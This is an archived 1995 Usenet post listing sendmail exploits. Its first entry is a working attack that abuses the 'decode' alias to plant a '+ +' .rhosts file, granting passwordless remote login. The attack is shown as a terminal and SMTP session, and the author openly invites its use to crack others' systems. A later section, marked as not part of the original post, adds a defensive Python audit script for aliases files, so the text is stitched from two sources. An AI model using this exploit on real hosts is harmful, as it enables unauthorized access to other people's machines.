Article 26952 of alt.security:
Path: nntpd.lkg.dec.com!crl.dec.com!crl.dec.com!caen!usenet.cis.ufl.edu!usenet.eel.ufl.edu!news.ultranet.com!news.sprintlink.net!dispatch.news.demon.net!demon!not-for-mail
From: postmaster@hacknet.demon.ac.uk (Postmaster)
Newsgroups: alt.security,alt.2600,alt.ph.uk,comp.security.unix,com.security.misc
Subject: Sendmail Exploits v.02b - mailhaq2.txt [1/1]
Date: Fri, 04 Aug 1995 19:05:11 GMT
Organization: Hacknet
Lines: 68
Message-ID: <807563111.4954@hacknet.demon.co.uk>
Reply-To: postmaster@hacknet.demon.co.uk
NNTP-Posting-Host: hacknet.demon.co.uk
X-NNTP-Posting-Host: hacknet.demon.co.uk
X-Newsreader: WinVN 0.99.5
Xref: nntpd.lkg.dec.com alt.security:26952 alt.2600:98116 comp.security.unix:18413

Here's something I threw together. I am looking for more exploits, so if you have any be sure to e-mail me them.

S e n d M a i l - B u g s E x p l o i t s Lists v.02b

Introduction and Legal Ramble
-----------------------------

This is written for anyone that's interested in learning about the many security holes that are resident in many versions of Sendmail. I do not care if you use it to protect your system against others, or crack other ppls systems...just don't involve me in it. I wrote it to collate all the information on sendmail into one list for convenience and perhaps it will help some people.

This paper is (c) 1995, however I do not object to you including any of these in a Zine (others have), FAQ, printed magazine, book etc... just mail me first so I know where it's distributed *:^)

Have you spotted a mistake or anything I could add? Then just add your own stuff and put yourself down on the credits and mail it me :)

Note: This is v.02b so there are bound to be mistakes and there is a lot of other stuff to add as well....and expand it to include FTP daemon bugs? I am extremely busy..and am only releasing it due to popular demand.

OH, all I ask is tell me what versions these work on, and if you have other exploits then mail me them :) !

BUG 1
-----

Problem: /etc/aliases sometimes contains:

decode: |/usr/bin/uudecode

Just comment it out.

% cat > outfile                       # Let's make our .rhosts file
+ +
^C
% uuencode outfile /usr/bin/.rhosts
begin 644 /usr/bin/.rhosts
$*R`K"@``
`
end
% telnet 127.1 25
Trying 127.0.0.1...
Connected to 127.1.
Escape character is '^]'.
220 fred Sendmail 5.64/zippy-1.22.01 ready at Mon, 24 Jul 95 09:34:12 -0400 (GMT)
helo
250 fred Hello (localhost), pleased to meet you    # Howz it hangin?
mail from: bin
250 bin... Sender ok
rcpt to: decode
250 decode... Recipient ok
data
354 Enter mail, end with "." on a line by itself
begin 644 /usr/bin/.rhosts            # just type our uuencoded + +
$*R`K"@``
`
end
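
Added example, not part of the original post: a Python check for the BUG 1 condition that lists every active alias in an aliases file that pipes mail into a program, and marks the ones that run uudecode. The sample file contents and the function names are constructed for illustration; point it at the real /etc/aliases text to audit a host.

```python
"""Audit a sendmail aliases file for aliases that pipe mail into a program."""
import re

# Constructed sample contents, not taken from a real host.
SAMPLE_ALIASES = '''\
# basic system aliases
postmaster: root
decode: |/usr/bin/uudecode
#uudecode: "|/usr/bin/uudecode"
staff: alice, bob,
    "|/usr/local/bin/archive staff"
logs: /var/log/maildrop
'''

def logical_lines(text):
    """Yield alias entries with comments dropped and continuation lines joined."""
    entry = ""
    for raw in text.splitlines():
        if raw.startswith("#") or not raw.strip():
            continue                      # comment or blank line
        if raw[0] in " \t":               # leading whitespace continues the entry
            entry += " " + raw.strip()
            continue
        if entry:
            yield entry
        entry = raw.strip()
    if entry:
        yield entry

def pipe_aliases(text):
    """Return (alias, command, is_decoder) for each active program-pipe target."""
    findings = []
    for entry in logical_lines(text):
        name, sep, rhs = entry.partition(":")
        if not sep:
            continue
        # Targets are comma separated; a quoted target may contain spaces or commas.
        for target in re.findall(r'"[^"]*"|[^,\s][^,]*', rhs):
            target = target.strip().strip('"').strip()
            if not target.startswith("|"):
                continue                  # plain user, file or :include: target
            command = target[1:].strip()
            program = command.split()[0] if command else ""
            findings.append((name.strip(), command, "uudecode" in program))
    return findings

if __name__ == "__main__":
    for alias, command, is_decoder in pipe_aliases(SAMPLE_ALIASES):
        tag = "REMOVE (decode alias)" if is_decoder else "review"
        print(f"{tag}: {alias} -> {command}")
```

After commenting out a flagged entry, the aliases database has to be rebuilt (newaliases) before sendmail stops honouring it.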